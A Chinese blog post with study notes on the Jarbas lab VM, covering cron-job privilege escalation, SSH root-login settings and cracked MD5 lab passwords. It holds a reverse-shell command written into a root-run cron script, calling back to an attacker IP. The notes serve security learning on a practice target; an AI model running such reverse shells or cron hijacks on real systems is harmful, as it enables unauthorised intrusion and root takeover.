JARBAS靶机

已于 2024-04-20 18:16:50 修改
阅读量391 收藏 10
点赞数 8
文章标签: 网络安全 笔记 靶机 web渗透
于 2024-04-20 18:13:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75361164/article/details/138006495
版权

涉及

[[nmap]]
[[Cronjob提权]]https://blog.csdn.net/2202_75361164/article/details/138006570
[[web渗透/反弹shell]]

参考

https://cloud.tencent.com/developer/article/2297565
https://redpomelo.xyz/archives/1699953656909
https://juejin.cn/post/7349119662133362703#heading-5
https://www.cnblogs.com/henry666/p/16927188.html

总结

uname -a #显示系统名、节点名称、操作系统的发行版号、内核版本等等

思路扩充

查看定时任务

cat /etc/crontab #较为常用 
cat /etc/cron.d #比较少用

可以看到箭头处,每五分钟以root的权限去执行CleaningScript.sh这个shell脚本,执行结果是将所有结果丢掉

5、修改计划任务提权

cat /etc/script/CleaningScript.sh #查看脚本内容 
ls -lia /etc/script/CleaningScript.sh #查看对sh文件的权限 
echo "/bin/bash -i >& /dev/tcp/192.168.32.131/4443 0>&1" >> /etc/script/CleaningScript.sh #续写文件CleaningScript.sh将反弹shell命令续写入计划任务脚本内

6、实战补充点–查看ssh是否允许远程登录

查看ssh是否允许远程登录/etc/ssh/sshd_config,查找 #PermitRootLogin 行,如果想允许 root 用户远程登录,将该行的注释符号 # 去掉,并将参数设置为 yes,即 PermitRootLogin yes。如果想禁止 root 用户远程登录,将参数设置为 no,即 PermitRootLogin no。

/etc/ssh/sshd_config

两种反弹shell

参考
https://juejin.cn/post/7349119662133362703#heading-5

其他

[[加密识别]]
一次解码多条md5网站
image.png

https://hashes.com/en/decrypt/hash
image.png

  • md5解码得到
密码
italia99
marianna
vipsu

用户名
tiago
trindade
eder

使用bp爆破,得出用户eder,密码vipsu

尘佑不尘
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
PyPI 官网下载 | jarbas_hive_mind-0.3.5.tar.gz
02-01
资源来自pypi官网。 资源全名:jarbas_hive_mind-0.3.5.tar.gz
jarbas靶机
ybkj6666的博客
11-08 156
使用arp-scan生成网络接口地址,查找ip。
渗透测试-Jarbas靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-18 1230
Jarbas靶机渗透1.环境部署2.信息收集3.开始测试80端口8080端口4.提权 1.环境部署 靶机下载地址:点此下载(建议使用迅雷下载) 攻击机:Kali 2019.2 amd64 靶机 : Jarbas靶机 目标:拿下靶机root权限和里面的flag 2.信息收集 使用arp-scan -l进行局域网主机发现 192.168.0.100这个地址是靶机地址 使用nmap进行端口扫描 目录...
靶机实操—JARBAS—学习笔记
qq_46965422的博客
03-13 263
Jarbas 1.0 – 向 90 年代末怀旧的巴西搜索引擎致敬。 目标:获取 root shell!
jarbas靶机攻略
qq_58683895的博客
10-18 61
使用目录扫描扫出来两个页面8080端口的扫描结果如图其中8080应该是后台登录框robots文件内容如图。
渗透靶场之Jarbas
m0_56190544的博客
07-09 492
完整的解析了vulnhub靶场中的Jarbas的渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
Vulnhub -- jarbas靶机渗透
Gh0st_1n_The_Shell的博客
05-31 592
信息收集 扫描开放的端口 进行目录爆破 尝试攻击 提权 提权--信息收集 目标:拿到服务器的Shell 信息收集 配置好后用nmap扫描 kali's ip:192.168.241.131 nmap -sP 192.168.241.131/24 一个个扫描 发现192.168.241.2是Vmware的服务,猜测jarbas的IP地址为192.168.241.142 扫描开放的端口 nmap -sV 192.168.241.142 ...
Vulnhub系列Jarbas靶机(三种方法)
2301_80203701的博客
12-18 1016
哎,有个root和jenkins但是不是/bash ,也没有什么,那看看有什么定时任务吧。好像一直在提示我们java,估计是要利用java相关的知识,可惜我不会(先走着看看吧)。换个端口进行反弹shell万一与上次的冲突就完蛋了,那就吃点东西等着反弹上来吧。随便点点看,看到一个可以创建任务,应该可以写入一个反弹shell脚本。有可能是个网站后台的登录账号或者是ssh连接的账号密码,先记着。不知道为什么这个靶机有点怪怪的,不知道是不是我搞的太多了。开放了22,80,3306,8080端口这四个全是突破口。
Vulnhub_JarBas靶机渗透测试
m0_66225311的博客
09-15 110
本次靶机学习到了关于jenkins框架的未授权访问漏洞getshell的操作步骤,善于搜索对应的cms漏洞是很多web渗透的成功前提本次提权又使用到了定时任务提权,也是依旧简单给的很明显,只需要写入反弹shell命令即可。
红队渗透靶场之Jarbas靶场(超详细)
xf555er的博客
11-26 1181
Jarbas靶场演练, 红队渗透必学靶场
论文研究 - 加强高中地理制图的使用
05-19
首先,根据Jarbas Passarinho School高中2年级学生研究的教科书内容,这项工作基于针对性文献综述,通过使用人造卫星(Google Earth)的图像开展实际活动来开展。 在进行此类活动时,已经注意到学生和老师在处理...
jarbasmedeiros
03-07
你好呀 :waving_hand: 我是Jarbas Medeiros 后端开发人员 :seedling: 我目前正在学习有关Java和Spring Boot的更多信息 :closed_mailbox_with_raised_flag: 如何联系我: 语言和框架 操作系统和工具 关于我
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8211
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
java学习笔记13
hanq2016的博客
05-04 623
java学习笔记,持续更新,非常完整,Math, Random
第 8 章 机器人平台设计之底盘实现(自学二刷笔记)
最新发布
Galaxy_1229的博客
05-09 394
ros_arduino_bridge
STM32CubeMX学习笔记30---FreeRTOS内存管理
H2z1220的博客
05-06 853
FreeRTOS 操作系统将内核与内存管理分开实现,操作系统内核仅规定了必要的内存管理函数原型,而不关心这些内存管理函数是如何实现的,所以在 FreeRTOS 中提供了多种内存分配算法(分配策略),但是上层接口(API)却是统一的。这样做可以增加系统的灵活性:用户可以选择对自己更有利的内存管理策略,在不同的应用场合使用不同的内存分配策略。
英语学习笔记8——What‘s your job?
AllenAC的博客
05-09 368
police男警察police女警察police n. 警力西方国家警察管的事很多。交警,刑警,武警一般不分开。taxi driver 出租车司机taxi / cab n. 出租车driver n. 司机taxi driver = 出租车 + 司机 = 出租车司机air hostess 空中服务员构成:air n. 空气hostess n. 女主人air hostess = 空气中的女主人 = 空姐 = 空中服务员postman n. 邮递员。
设计模式学习笔记 - 回顾总结:如何将设计思想、原则、模式等理论知识应用到项目中?
chenjian723122704的专栏
05-07 931
我们第整个专栏的理论知识点做了串讲,不知道你掌握的如何?对于上节课总结的重点内容,希望你能多花点时间搞透彻,对于一些不那么重要的内容,你可以把它们当做资料,用到的时候随手查询,再深入学习。实际上,虽然理论掌握得差不多,专栏也很贴近实战,每个知识点的讲解都有结合实际的代码案例,并且最后还有集中的项目实战,但落实到自己写代码时,可能还是无法将学习到的理论知识很好的应用。本章,就再聊一聊如何将设计思想、原则、模式等理论知识应用到实际的项目开发中。
MRI学习笔记-spm独立样本t检验
linly1219的博客
05-04 255
SPM操作:

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值